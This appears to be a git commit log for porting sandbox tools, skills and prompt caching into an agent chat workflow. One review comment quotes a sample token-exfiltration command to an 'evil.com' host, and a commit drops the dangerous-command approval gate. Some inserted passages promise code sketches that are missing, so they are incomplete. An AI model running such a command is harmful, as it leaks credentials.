Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. 
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host-side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued command exfiltrate it via env (`curl -d "$TOKEN" evil.com`). Slim PR 4 has no actual consumer for the token — only the future `skill` tool needs it. Proper short-lived token minting will land alongside that port. - **P2** (`isAgentContext` too weak): tightened the guard to validate sandbox.state is a non-null object AND sandbox.workingDirectory is a non-empty string. Earlier guard returned true for `{ sandbox: {} }`, letting tools later crash on undefined fields. - P1 + P2 about stopWhen / needsApproval: resolved by sweetman's deletions above. - P2 (test file >100 lines): dismissed — same as PR 3 review. The repo has no enforced max-lines rule; existing tests routinely exceed 700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds.
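The tightened guard can be sketched as below. It requires `sandbox.state` to be a non-null object and `sandbox.workingDirectory` to be a non-empty string, so `{ sandbox: {} }` is now rejected. `AgentContextLike` and `isRecord` are simplified, hypothetical stand-ins for api's real types.

```typescript
// Simplified stand-in for api's AgentContext (assumption: only the fields the guard checks).
interface AgentContextLike {
  sandbox: { state: object; workingDirectory: string };
}

function isRecord(value: unknown): value is Record<string, unknown> {
  return typeof value === "object" && value !== null;
}

function isAgentContext(value: unknown): value is AgentContextLike {
  if (!isRecord(value)) return false;
  const sandbox = value.sandbox;
  if (!isRecord(sandbox)) return false;
  // Both fields must be usable before any tool tries to reconnect.
  return isRecord(sandbox.state) && typeof sandbox.workingDirectory === "string" && sandbox.workingDirectory.length > 0;
}
```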
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. 
New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). 
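The two shared helpers can be sketched as follows. `shellEscape` wraps a value in single quotes and rewrites each embedded `'` as `'\''`, which closes the quote, emits an escaped quote, and reopens the quote. A POSIX shell then passes the value through literally. `toDisplayPath` returns a workdir-relative path for targets inside the working directory and the absolute path otherwise. These are illustrations, not the shipped code. Returning `.` for the working directory itself is an assumption.

```typescript
// Single-quote a value for a POSIX shell: every ' becomes '\'' inside the quotes.
function shellEscape(value: string): string {
  return `'${value.replace(/'/g, `'\\''`)}'`;
}

// Show paths inside the working directory relative to it; leave others absolute.
function toDisplayPath(absolutePath: string, workingDirectory: string): string {
  const root = workingDirectory.replace(/\/+$/, ""); // tolerate trailing slashes
  if (absolutePath === root) return "."; // assumption: the workdir itself displays as "."
  // Require the "/" boundary so "/wx" is not treated as inside "/w".
  if (root !== "" && absolutePath.startsWith(`${root}/`)) {
    return absolutePath.slice(root.length + 1);
  }
  return absolutePath;
}
```

For example, `shellEscape("it's")` yields `'it'\''s'`, which is safe to interpolate into a command such as `grep -rn` before passing it to the sandbox.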
Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project-level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — `$ARGUMENTS` replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting. New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model.
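The skill-content pipeline (extractSkillBody → injectSkillDirectory → substituteArguments) can be sketched as three small functions. This sketch makes three assumptions: the frontmatter is a leading block delimited by `---` lines, a blank line follows the `Skill directory: <path>` header, and every `$ARGUMENTS` occurrence is replaced. `renderSkill` is a hypothetical composition helper.

```typescript
// Strip a leading `---`-delimited frontmatter block, if present.
function extractSkillBody(content: string): string {
  const match = /^---\r?\n[\s\S]*?\r?\n---\r?\n?/.exec(content);
  return (match ? content.slice(match[0].length) : content).trimStart();
}

// Prepend the directory header so the model can resolve relative files.
function injectSkillDirectory(body: string, skillDirectory: string): string {
  return `Skill directory: ${skillDirectory}\n\n${body}`;
}

// split/join replaces every occurrence and avoids String.replace's `$` patterns.
function substituteArguments(body: string, args: string): string {
  return body.split("$ARGUMENTS").join(args);
}

// Hypothetical composition in the documented order.
function renderSkill(content: string, skillDirectory: string, args = ""): string {
  return substituteArguments(injectSkillDirectory(extractSkillBody(content), skillDirectory), args);
}
```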
Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at `${workingDirectory}/skills/` — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - `${workingDirectory}/.claude/skills/` (project, claude-style) - `${workingDirectory}/.agents/skills/` (project, agents-style) - `${HOME}/.agents/skills/` (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands.
Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: `${HOME}/.agents/skills`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against `recoupable/org-rostrum-pacific-...` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked `skill({ skill: "recoup-api" })` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds.
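The single global path, `${HOME}/.agents/skills`, can be sketched as a one-line join that tolerates a trailing slash on the resolved home directory. This is a minimal sketch. The home directory is passed in, because resolving it (with the documented `/root` default) is resolveSandboxHomeDirectory's job.

```typescript
// Hypothetical sketch: build `${HOME}/.agents/skills`, tolerating trailing slashes on HOME.
function getGlobalSkillsDirectory(homeDirectory: string): string {
  const home = homeDirectory.replace(/\/+$/, "");
  return `${home}/.agents/skills`;
}
```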
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. 
The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. 
api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. 
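The model plumbing described above can be sketched without the `ai` package. In this sketch:
- The model is a type parameter rather than `LanguageModel`.
- The `sandbox` field stands in for the serializable rest of the context.
- `withModel` is a hypothetical name for the per-step merge that runAgentStep performs.

Only the `ctx.subagentModel ?? ctx.model` fallback and the idea of omitting model fields from the durable input come directly from the commit.

```typescript
// Hypothetical context shape; in api the model type is the ai SDK's LanguageModel.
interface AgentContextLike<Model> {
  sandbox: { workingDirectory: string };
  model: Model;
  subagentModel?: Model;
}

// Live model instances are not JSON-serializable, so durable workflow input omits them.
type DurableAgentContextLike<Model> = Omit<AgentContextLike<Model>, "model" | "subagentModel">;

// Hypothetical per-step merge: the step constructs the model and adds it back.
export function withModel<Model>(
  durable: DurableAgentContextLike<Model>,
  model: Model,
): AgentContextLike<Model> {
  return { ...durable, model };
}

function hasModel<Model>(value: unknown): value is AgentContextLike<Model> {
  return typeof value === "object" && value !== null && "model" in value;
}

export function getSubagentModel<Model>(experimentalContext: unknown, toolName: string): Model {
  if (!hasModel<Model>(experimentalContext)) {
    // Error wording is illustrative.
    throw new Error(`${toolName}: experimental_context is missing a model`);
  }
  // Subagents inherit the parent's model unless an override is set.
  return experimentalContext.subagentModel ?? experimentalContext.model;
}
```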
Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow.

New (SRP, one function per file):
- lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata.
- lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records.
- lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata.
- lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts.

Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4).

Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean.
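The accumulation described above can be sketched roughly as follows. Several assumptions apply:
- The usage shape is simplified to three optional counters. The SDK's `LanguageModelUsage` has more fields.
- The summing rule keeps a total `undefined` only when both sides are unknown. This mirrors what `addTokenCounts` presumably does.
- `createStepAccumulator` is a hypothetical stand-in for `buildMessageMetadataCallback`. It takes a step's usage and gateway cost directly instead of finish-step parts.
- `stepFinishReasons` is omitted.

```typescript
// Simplified, hypothetical usage shape: the SDK's LanguageModelUsage carries
// more fields (for example nested input/output token details).
interface UsageLike {
  inputTokens?: number;
  outputTokens?: number;
  totalTokens?: number;
}

// Sums two optional counts; the result is undefined only if both are unknown.
function addTokenCounts(a?: number, b?: number): number | undefined {
  if (a === undefined && b === undefined) return undefined;
  return (a ?? 0) + (b ?? 0);
}

// Pointwise sum of two usage records.
export function addLanguageModelUsage(a: UsageLike, b: UsageLike): UsageLike {
  return {
    inputTokens: addTokenCounts(a.inputTokens, b.inputTokens),
    outputTokens: addTokenCounts(a.outputTokens, b.outputTokens),
    totalTokens: addTokenCounts(a.totalTokens, b.totalTokens),
  };
}

// Each factory call returns a fresh closure, so totals never leak between turns.
export function createStepAccumulator(modelId: string) {
  let totalUsage: UsageLike | undefined;
  let totalCost = 0;
  return (stepUsage: UsageLike, stepCost = 0) => {
    totalUsage =
      totalUsage === undefined ? stepUsage : addLanguageModelUsage(totalUsage, stepUsage);
    totalCost += stepCost;
    return {
      modelId,
      lastStepUsage: stepUsage,
      totalMessageUsage: totalUsage,
      lastStepCost: stepCost,
      totalMessageCost: totalCost,
    };
  };
}
```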
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. 
Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." 
After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). 
- Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): Anthropic prompt cache control (Bundle A.6) (#599) Fourth open-agents → api cutover bundle. runAgentStep was sending the same system prompt + tool definitions on every turn as fresh input, even though Anthropic prompt caching can shave 90% off subsequent input cost. Production traces showed `cacheReadTokens: 0` on every api turn, while open-agents shows cacheRead matching cacheWrite from the prior turn — i.e. open-agents reuses the cached prefix. Changes (SRP — one function per file): - `lib/agent/contextManagement/isAnthropicModel.ts` — predicate port of open-agents' `packages/agent/context-management/cache-control.ts:5`. - `lib/agent/contextManagement/addCacheControlToTools.ts` — marks the LAST tool with `cacheControl: { type: "ephemeral" }`. Last-only conserves Anthropic's 4-breakpoint limit. 
- `lib/agent/contextManagement/addCacheControlToMessages.ts` — marks the LAST message with `cacheControl` on every step, per Anthropic's "mark the final block of the final message" guidance.

`runAgentStep` now:
- Wraps the tool set via `addCacheControlToTools(...)` before passing to streamText (static — set once per step).
- Adds a `prepareStep` callback that wraps `messages` via `addCacheControlToMessages(...)` on every internal model call.

Production behavior reproducer (Haiku 4.5, identical 2-turn prompt to both backends):

api prod (broken):
  turn1 cacheWrite=0 cacheRead=0 cost=$0.005952
  turn2 cacheWrite=0 cacheRead=0 cost=$0.005959
  → flat cost; full input billed every turn.

open-agents prod:
  turn1 cacheWrite=10966 cacheRead=0
  turn2 cacheWrite=12 cacheRead=10966
  cost drops 12x → near-full prefix re-read from cache on turn 2.

After this PR, api should match open-agents' caching curve.

Tests: 19 new (7 isAnthropicModel + 5 addCacheControlToTools + 5 addCacheControlToMessages + 2 runAgentStep wiring assertions); full suite 3138/3138 pass; lint clean.

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
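The cache-control helpers from Bundle A.6 can be sketched as immutable wrappers that mark only the last tool and the last message. Two parts are assumptions:
- **Marker placement.** The sketch places the marker under `providerOptions.anthropic.cacheControl`, following the AI SDK's Anthropic provider convention. The commit only says the item is marked with `cacheControl: { type: "ephemeral" }`.
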